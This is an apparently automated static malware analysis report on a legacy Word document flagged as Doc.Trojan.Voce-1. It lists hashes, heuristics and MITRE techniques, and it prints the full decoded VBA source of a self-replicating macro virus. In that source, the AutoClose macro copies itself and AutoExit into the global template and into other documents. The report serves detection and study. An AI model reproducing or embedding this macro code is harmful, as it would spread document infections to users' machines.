Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f54d6569680023f9…

MALICIOUS

Office (OLE)

Size: 37.0 KB
Created: 2000-03-27 13:58:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f7983006a682cc3e4d1866ed5fe592d8
SHA-1: 94aa24ba9960ffd02ac7903c4fed2e97fad38731
SHA-256: f54d6569680023f95c75ea8e94890416e648b5bddd77c7195ecc4b70f4eb5e24
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoClose macro attempts to copy itself and the AutoExit macro to the global template, indicating an attempt to infect other documents. The AutoExit macro contains logic that would display a message box on July 28th. The presence of AutoClose and AutoExit macros suggests a macro-based infection vector, likely delivered via spearphishing.

Heuristics (4)

  • ClamAV: Doc.Trojan.Voce-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Voce-1
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2053 bytes
SHA-256: 2bb89821526ca8bb6cadd0ffd30320aebabe3c53f50fae92310c53cda96401dd
Detection: ClamAV: Doc.Trojan.Voce-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
    Infectar
End Sub

Private Sub Infectar()
Dim Infectado
Infectado = VerificaVitima(0)
If Infectado = 0 Then
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose"
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExit", "Global:AutoExit"
Else
    Infectado = VerificaVitima(1)
    If Infectado = 0 Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose"
        WordBasic.MacroCopy "Global:AutoExit", WordBasic.[WindowName$]() + ":AutoExit"
    End If
End If
End Sub

Private Function VerificaVitima(Contexto)
Dim QtdadeMacros
Dim Infectado
Dim MAP0997
Dim i
    QtdadeMacros = WordBasic.CountMacros(Contexto)
    Infectado = 0
    MAP0997 = 0
    If QtdadeMacros > 0 Then
        For i = 1 To QtdadeMacros
            If WordBasic.[MacroName$](i, Contexto) = "AutoClose" Or MAP0997 = 1 Then
                MAP0997 = 1
                If WordBasic.[MacroName$](i, Contexto) = "AutoExit" Then
                    Infectado = 1
                End If
            End If
        Next
    End If
    VerificaVitima = Infectado
End Function

Attribute VB_Name = "AutoExit"

Public Sub MAIN()
    Mensagem
End Sub

Private Sub Mensagem()
Dim Atraso
Dim fim
    If (WordBasic.Day(WordBasic.Now()) = 28 And WordBasic.Month(WordBasic.Now()) = 7) Then
        WordBasic.MsgBox "Parabéns para mim! ", "Meu aniversário", -8
        Atraso = 3
    Else
        WordBasic.MsgBox "Fechando 2807M! ", "Nova Vítima", -8
        Atraso = 1
    End If
    fim = WordBasic.Second(WordBasic.Now()) + 1
    While WordBasic.Second(WordBasic.Now()) <> fim
    Wend
End Sub